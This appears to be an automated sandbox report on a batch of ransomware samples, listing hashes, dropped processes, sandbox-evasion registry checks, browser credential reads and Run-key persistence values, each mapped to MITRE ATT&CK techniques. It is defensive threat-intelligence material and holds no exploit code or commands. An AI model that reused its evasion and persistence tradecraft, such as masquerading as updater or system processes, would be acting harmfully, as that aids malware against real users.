Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.execmd.execmd.exeTrojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exeauthupd.exeTrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.execipher.execipher.exeTrojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exeIEXPLORE.EXEexplorer.exeTrojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exeqiyg.execmd.exeWMIC.exeRegAsm.exeTrojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exeTrojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exeTrojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exeregasm.exesvhost.exezeise.exeTrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	authupd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	cipher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	cipher.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	qiyg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	regasm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	svhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	zeise.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe

Checks BIOS information in registry 2 TTPs 5 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

explorer.exeTrojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exesemo.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	semo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	semo.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

qiyg.exezeise.exeTrojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exeTrojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Control Panel\International\Geo\Nation	qiyg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Control Panel\International\Geo\Nation	zeise.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Control Panel\International\Geo\Nation	Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Control Panel\International\Geo\Nation	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe

Executes dropped EXE 47 IoCs

Processes:

HEUR-Trojan-Ransom.Win32.Generic-44bfc4e633bd60a42304856360c3b433f336be8c277fa62f54300b2adee0e319.exeHEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exeHEUR-Trojan-Ransom.Win32.Generic-e2e0fc91311396226a5487adc39722495b0951844e505541a3fae1cf27d0072d.exeTrojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exeHEUR-Trojan-Ransom.Win32.Generic-933adce253241d48c01191e7d6749075aff5b2e8643f5ce191f7f380979a5e08.exeTrojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exeTrojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exeTrojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exeTrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exeTrojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exeTrojan-Ransom.Win32.Blocker.meia-8179d0b5e1307621aa793c502a89ac3b7aba833f3b4fc815f99d0dbc85aa7c06.exeTrojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exeTrojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exeTrojan-Ransom.Win32.Foreign.nxqg-f41d6da3b7da9c73e404c7e8142d7c4ef60d950e6034bf76286d8bc33fde4f55.exeTrojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exeTrojan-Ransom.Win32.Foreign.nylp-19e0727b00b01ff02b6b60c1356cf24d688a35ee1b3c2792181849da6dd23a0c.exeTrojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exeHEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exeyctik.exeyctik.exeTrojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exeTrojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exeTrojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exeTrojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exeTsojan-Rantom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exeTsojan-Rantom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exesemo.exesemo.exeTrojan-Ransom.Win32.Wanna.zbu-0e7b6931a19969d9f5329d5a0f91e10982cdf30aa6de3673818468e2c58e3d37.exeIIXguS.exeTrojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exesvhost.exetasksche.exeauthupd.exeadsnobby.exechtbider.exeTrojan-Ransom.Win32.Wanna.zbu-0e7b6931a19969d9f5329d5a0f91e10982cdf30aa6de3673818468e2c58e3d37.exeauthupd.exeTrojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exetasksche.exeTrojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exeqiyg.exezeise.exeTrojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exeTrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exeTrojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exeTrojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe

pid	Process
2412	HEUR-Trojan-Ransom.Win32.Generic-44bfc4e633bd60a42304856360c3b433f336be8c277fa62f54300b2adee0e319.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
1688	HEUR-Trojan-Ransom.Win32.Generic-e2e0fc91311396226a5487adc39722495b0951844e505541a3fae1cf27d0072d.exe
1800	Trojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe
2000	HEUR-Trojan-Ransom.Win32.Generic-933adce253241d48c01191e7d6749075aff5b2e8643f5ce191f7f380979a5e08.exe
1164	Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
1088	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
628	Trojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exe
1368	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
1840	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
1284	Trojan-Ransom.Win32.Blocker.meia-8179d0b5e1307621aa793c502a89ac3b7aba833f3b4fc815f99d0dbc85aa7c06.exe
2776	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
2168	Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
1708	Trojan-Ransom.Win32.Foreign.nxqg-f41d6da3b7da9c73e404c7e8142d7c4ef60d950e6034bf76286d8bc33fde4f55.exe
2652	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
1056	Trojan-Ransom.Win32.Foreign.nylp-19e0727b00b01ff02b6b60c1356cf24d688a35ee1b3c2792181849da6dd23a0c.exe
2816	Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
2820	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
2996	yctik.exe
1760	yctik.exe
1436	Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
2948	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
1512	Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
1388	Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
1144	Tsojan-Rantom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
2580	Tsojan-Rantom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
3036	semo.exe
2996	semo.exe
468	Trojan-Ransom.Win32.Wanna.zbu-0e7b6931a19969d9f5329d5a0f91e10982cdf30aa6de3673818468e2c58e3d37.exe
496	IIXguS.exe
3948	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
3860	svhost.exe
3160	tasksche.exe
4700	authupd.exe
4768	adsnobby.exe
4076	chtbider.exe
6328	Trojan-Ransom.Win32.Wanna.zbu-0e7b6931a19969d9f5329d5a0f91e10982cdf30aa6de3673818468e2c58e3d37.exe
5872	authupd.exe
5136	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
5532	tasksche.exe
1552	Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
6160	qiyg.exe
4936	zeise.exe
2184	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
4088	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
2992	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
5192	Trojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe

Loads dropped DLL 34 IoCs

Processes:

HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exeyctik.exeTrojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exetaskmgr.exeTrojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exesemo.exeTrojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exeTrojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exeHEUR-Trojan-Ransom.Win32.Generic-e2e0fc91311396226a5487adc39722495b0951844e505541a3fae1cf27d0072d.execmd.exeWScript.execmd.exeauthupd.exeWScript.exeregasm.exeWScript.exeTrojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exeWScript.exeWScript.exeTrojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exeTrojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exeWScript.exeWScript.exe

pid	Process
2820	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
2820	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
2996	yctik.exe
1388	Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
1388	Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
2444	taskmgr.exe
1512	Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
1512	Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
3036	semo.exe
628	Trojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exe
628	Trojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exe
628	Trojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exe
628	Trojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exe
1800	Trojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe
1800	Trojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe
1688	HEUR-Trojan-Ransom.Win32.Generic-e2e0fc91311396226a5487adc39722495b0951844e505541a3fae1cf27d0072d.exe
2860	cmd.exe
4824	WScript.exe
5592	cmd.exe
4700	authupd.exe
3440	WScript.exe
2508	regasm.exe
2508	regasm.exe
1780	WScript.exe
2508	regasm.exe
7084	Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
2692	WScript.exe
4604	WScript.exe
2776	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
2776	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
1164	Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
1164	Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
2704	WScript.exe
3476	WScript.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Adds Run key to start application 2 TTPs 26 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svhost.exeTrojan-Ransom.Win32.Blocker.meia-8179d0b5e1307621aa793c502a89ac3b7aba833f3b4fc815f99d0dbc85aa7c06.exeWScript.exeTrojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exeWScript.exeexplorer.exeWScript.exeWScript.exeWScript.exeDwm.exeTrojan-Ransom.Win32.Foreign.nxqg-f41d6da3b7da9c73e404c7e8142d7c4ef60d950e6034bf76286d8bc33fde4f55.exeHEUR-Trojan-Ransom.Win32.Generic-e2e0fc91311396226a5487adc39722495b0951844e505541a3fae1cf27d0072d.exeTrojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exeWScript.exeTrojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exeTrojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exeWScript.exeTrojan-Ransom.Win32.Foreign.nylp-19e0727b00b01ff02b6b60c1356cf24d688a35ee1b3c2792181849da6dd23a0c.exeauthupd.exeqiyg.exezeise.exeexplorer.exeTrojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 2.0 = "\"C:\\ProgramData\\Google Updater 2.0\\3eae57177e1k3w5.exe\""	svhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winmgr = "C:\\Users\\Admin\\AppData\\Roaming\\RmiRNe0PT9k3qos89RIUWm8AN1TA.exe"	Trojan-Ransom.Win32.Blocker.meia-8179d0b5e1307621aa793c502a89ac3b7aba833f3b4fc815f99d0dbc85aa7c06.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft Framework = "C:\\PROGRA~3\\IIXguS.lnk"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd = "C:\\Users\\Admin\\Desktop\\00310\\Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe"	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft Framework = "C:\\PROGRA~3\\IIXguS.lnk"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 2.0 = "C:\\ProgramData\\Google Updater 2.0\\3eae57177e1k3w5.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft Framework = "C:\\PROGRA~3\\IIXguS.lnk"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft Framework = "C:\\PROGRA~3\\IIXguS.lnk"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft Framework = "C:\\PROGRA~3\\IIXguS.lnk"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\{7FC1003E-0C21-F6F6-DB20-DDC60B5D588F} = "C:\\Users\\Admin\\AppData\\Roaming\\Yqpei\\semo.exe"	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\comusers = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Asfeprov\\adsnobby.exe"	Trojan-Ransom.Win32.Foreign.nxqg-f41d6da3b7da9c73e404c7e8142d7c4ef60d950e6034bf76286d8bc33fde4f55.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\App = "C:\\Users\\Admin\\AppData\\Roaming\\authupd.exe -boot"	HEUR-Trojan-Ransom.Win32.Generic-e2e0fc91311396226a5487adc39722495b0951844e505541a3fae1cf27d0072d.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 2.0 = "\"C:\\ProgramData\\Google Updater 2.0\\3eae57177e1k3w5.exe\""	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 2.0 = "\"C:\\ProgramData\\Google Updater 2.0\\3eae57177e1k3w5.exe\""	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft Framework = "C:\\PROGRA~3\\IIXguS.lnk"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\{79A223CA-8C12-EC56-8BCA-CF99B4092895} = "C:\\Users\\Admin\\AppData\\Roaming\\Wytex\\yctik.exe"	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsHosts = "C:\\Users\\Admin\\Desktop\\00310\\Trojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe"	Trojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsHosts = "C:\\ProgramData\\svhost.exe"	svhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\mediain = "C:\\Users\\Admin\\Desktop\\00310\\Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe"	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft Framework = "C:\\PROGRA~3\\IIXguS.lnk"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\DHCPupnp = "C:\\Users\\Admin\\AppData\\Roaming\\drprssec\\chtbider.exe"	Trojan-Ransom.Win32.Foreign.nylp-19e0727b00b01ff02b6b60c1356cf24d688a35ee1b3c2792181849da6dd23a0c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\xow = "C:\\Users\\Admin\\AppData\\Roaming\\xow\\xow.exe"	authupd.exe
